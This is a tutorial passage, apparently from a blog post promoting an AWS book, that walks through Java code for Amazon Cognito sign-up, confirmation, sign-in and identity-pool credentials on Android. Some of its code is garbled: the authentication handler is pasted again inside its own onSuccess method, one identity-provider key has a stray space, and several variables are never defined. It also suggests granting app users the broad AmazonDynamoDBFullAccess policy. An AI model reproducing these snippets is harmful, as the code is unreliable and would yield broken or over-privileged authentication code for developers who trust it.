Now, create the CognitoUserAttributes object and add the user value in a key-value pair to sign up for the user: CognitoUserAttributes userAttributes = new CognitoUserAttributes(); String usernameInput = username.getText().toString(); String userpasswordInput = password.getText().toString(); userAttributes.addAttribute("Name", name.getText().toString()); userAttributes.addAttribute("Email", email.getText().toString()); userAttributes.addAttribute("Phone", phone.getText().toString()); userPool.signUpInBackground(usernameInput, userpasswordInput, userAttributes, null, signUpHandler); To register or sign up a new user, you have to call SignUpHandler. It contains two methods: onSuccess and onFailure. For onSuccess, it will call when it successfully registers a new user. The user needs to confirm the code required to activate the account. You have to pass parameters such as Cognito user, confirm the state of the user, medium and destination of the confirmation code, such as email or phone, and the value for that: SignUpHandler signUpHandler = new SignUpHandler() { @Override public void onSuccess(CognitoUser user, boolean signUpConfirmationState, CognitoUserCodeDeliveryDetails cognitoUserCodeDeliveryDetails) { // Check if the user is already confirmed if (signUpConfirmationState) { showDialogMessage("New User Sign up successful!","Your Username is : "+usernameInput, true); } } @Override public void onFailure(Exception exception) { showDialogMessage("New User Sign up failed.",AppHelper.formatException(exception),false); } }; You can see on the User Pool console that the user has been successfully signed up but not confirmed yet: Confirmation code request: After successfully signing up, the user needs to confirm the code for sign-in. The confirmation code will be sent to the user's email or phone. Sometimes it may automatically confirm the user by triggering a Lambda function. If you selected automatic verification when you created the User Pool, it will send the confirmation code to your email or phone. You can let the user know where they will get the confirmation code from the cognitoUserCodeDeliveryDetails object. It will indicate where you will send the confirmation code: VerificationHandler resendConfCodeHandler = new VerificationHandler() { @Override public void onSuccess(CognitoUserCodeDeliveryDetails details) { showDialogMessage("Confirmation code sent.","Code sent to "+details.getDestination()+" via "+details.getDeliveryMedium()+".", false); } @Override public void onFailure(Exception exception) { showDialogMessage("Confirmation code request has failed", AppHelper.formatException(exception), false); } }; In this case, the user will receive an email with the confirmation code: The user can complete the sign-up process after entering the valid confirmation code. To confirm the user, you need to call the GenericHandler. AWS SDK uses this GenericHandler to communicate the result of the confirmation API: GenericHandler confHandler = new GenericHandler() { @Override public void onSuccess() { showDialogMessage("Success!",userName+" has been confirmed!", true); } @Override public void onFailure(Exception exception) { showDialogMessage("Confirmation failed", exception, false); } }; Once the user confirms, it will be updated in the Amazon Cognito console: Sign in user to the app: You must create an authentication callback handler for the user to sign in to your application. 
The following code will show you how the interaction happens from your app and SDK: // call Authentication Handler for User sign-in process. AuthenticationHandler authHandler = new AuthenticationHandler() { @Override public void onSuccess(CognitoUserSession cognitoUserSession) { launchUser(); // call Authentication Handler for User sign-in process. AuthenticationHandler authHandler = new AuthenticationHandler() { @Override public void onSuccess(CognitoUserSession cognitoUserSession) { launchUser(); } @Override public void getAuthenticationDetails(AuthenticationContinuation continuation, String username) { // Get user sign-in credential information from API. AuthenticationDetails authDetails = new AuthenticationDetails(username, password, null); // Send this user sign-in information for continuation continuation.setAuthenticationDetails(authDetails); // Allow user sign-in process to continue continuation.continueTask(); } @Override public void getMFACode(MultiFactorAuthenticationContinuation mfaContinuation) { // Get Multi-factor authentication code from user to sign-in mfaContinuation.setMfaCode(mfaVerificationCode); // Allow user sign-in process to continue mfaContinuation.continueTask(); } @Override public void onFailure(Exception e) { // User Sign-in failed. Please check the exception showDialogMessage("Sign-in failed", e); } @Override public void authenticationChallenge(ChallengeContinuation continuation) { /** You can implement Custom authentication challenge logic * here. Pass the user's responses to the continuation. */ } }; Access AWS resources from application user: A user can access AWS resource from the application by creating an AWS Cognito Federated Identity Pool and associating an existing User Pool with that Identity Pool, by specifying User Pool ID and App client id. Please see the next section (Step 5) to create the Federated Identity Pool with Cognito. Let's continue with the same application; after the user is authenticated, add the user's identity token to the logins map in the credential provider. The provider name depends on the Amazon Cognito User Pool ID and it should have the following structure: cognito-idp.<USER_POOL_REGION>.amazonaws.com/<USER_POOL_ID> For this example, it will be: cognito-idp.us-east-1.amazonaws.com/us-east-1_XUGRPHAWA. Now, in your credential provider, pass the ID token that you get after successful authentication: // After successful authentication get id token from // CognitoUserSession String idToken = cognitoUserSession.getIdToken().getJWTToken(); // Use an existing credential provider or create new CognitoCachingCredentialsProvider credentialsProvider = new CognitoCachingCredentialsProvider(context, IDENTITY_POOL_ID, REGION); // Credentials provider setup Map<String, String> logins = new HashMap<String, String>(); logins.put("cognito-idp.us-east-1.amazonaws.com/us-east-1_ XUGRPHAWA", idToken); credentialsProvider.setLogins(logins); You can use this credential provider to access AWS services, such as Amazon DynamoDB, as follows: AmazonDynamoDBClient dynamoDBClient = new AmazonDynamoDBClient(credentialsProvider) You have to provide the specific IAM permission to access AWS services, such as DynamoDB. You can add this permission to the Federated Identities, as mentioned in the following Step 6, by editing the View Policy Document. Once you have attached the appropriate policy, for example, AmazonDynamoDBFullAccess, for this application, you can perform the operations such as create, read, update, and delete operations in DynamoDB. 
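As a concrete illustration of that last point, the following minimal sketch writes a single item with the low-level DynamoDB client created from the Cognito credentials provider shown above. The table name (UserProfile), key, and attributes are hypothetical placeholders, and the IAM role attached to the identity pool must allow the corresponding dynamodb:PutItem action on that table.

import java.util.HashMap;
import java.util.Map;

import com.amazonaws.auth.CognitoCachingCredentialsProvider;
import com.amazonaws.services.dynamodbv2.AmazonDynamoDBClient;
import com.amazonaws.services.dynamodbv2.model.AttributeValue;
import com.amazonaws.services.dynamodbv2.model.PutItemRequest;

public class ProfileWriter {

    // credentialsProvider is the CognitoCachingCredentialsProvider configured with the user's ID token.
    public static void saveProfile(CognitoCachingCredentialsProvider credentialsProvider, String displayName) {
        AmazonDynamoDBClient dynamoDBClient = new AmazonDynamoDBClient(credentialsProvider);

        // Hypothetical table "UserProfile" with a string hash key "identityId".
        Map<String, AttributeValue> item = new HashMap<String, AttributeValue>();
        item.put("identityId", new AttributeValue().withS(credentialsProvider.getIdentityId()));
        item.put("displayName", new AttributeValue().withS(displayName));

        PutItemRequest request = new PutItemRequest()
                .withTableName("UserProfile")
                .withItem(item);

        // The request is signed with the temporary credentials vended for this identity.
        dynamoDBClient.putItem(request);
    }
}

Combined with fine-grained IAM conditions on the Cognito identity ID, this pattern lets each signed-in user read and write only their own rows.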
Now, we will look at how to create the Amazon Cognito Federated Identities. Amazon Cognito Federated Identities Amazon Cognito Federated Identities enables you to create unique identities for the user and, authenticate with Federated Identity Providers. With this identity, the user will get temporary, limited-privilege AWS credentials. With these credentials, the user can synchronize their data with Amazon Cognito Sync or securely access other AWS services such as Amazon S3, Amazon DynamoDB, and Amazon API Gateway. It supports Federated Identity providers such as Twitter, Amazon, Facebook, Google, OpenID Connect providers, or SAML identity providers, unauthenticated identities. It also supports developer-authenticated identities from which you can register and authenticate the users through your own backend authentication systems. You need to create an Identity Pool to use Amazon Cognito Federated Identities in your application. This Identity Pool is specific for your account to store user identity data. Creating a new Identity Pool from the console Please perform the following steps to create a new Identity Pool from the console: Log in to the AWS Management console and select the Amazon Cognito Service. It will show you two options: Manage your User Pools and Manage Federated Identities. Select Manage Federated Identities. It will navigate you to the Create new identity pool screen. Enter a unique name for the Identity pool name: You can enable unauthenticated identities by selecting Enable access to unauthenticated identities from the collapsible section: Under Authentication providers, you can allow your users to authenticate using any of the authentication methods. Click on Create pool. You must select at least one identity from Authentication providers to create a valid Identity Pool. Here Cognito has been selected for a valid Authentication provider by adding User Pool ID and App client id: It will navigate to the next screen to create a new IAM role by default, to provide limited permission to end users. These permissions are for Cognito Sync and Mobile Analytics but you can edit policy documents to add/update permissions for more services. It will create two IAM roles. One for authenticated users that are supported by identity providers and another for unauthenticated users, known as guest users. Click Allow to generate the Identity Pool: Once the Identity Pool is generated, it will navigate to the Getting started with Amazon Cognito screen for that Identity Pool. Here, it will provide you with downloadable AWS SDK for different platforms such as Android, iOS - Objective C, iOS - Swift, JavaScript, Unity, Xamarin, and .NET. It also provides sample code for Get AWS Credentials and Store User Data: You have created Amazon Cognito Federated Identities. We looked at how user authentication process in AWS Cognito works with User Pools and Federated Identities. If you found this post useful, check out the book 'Expert AWS Development' to learn other concepts such as Amazon Cognito sync, traditional web hosting etc, in AWS development. Keep your serverless AWS applications secure [Tutorial] Amazon Neptune, AWS’ cloud graph database, is now generally available How to start using AWS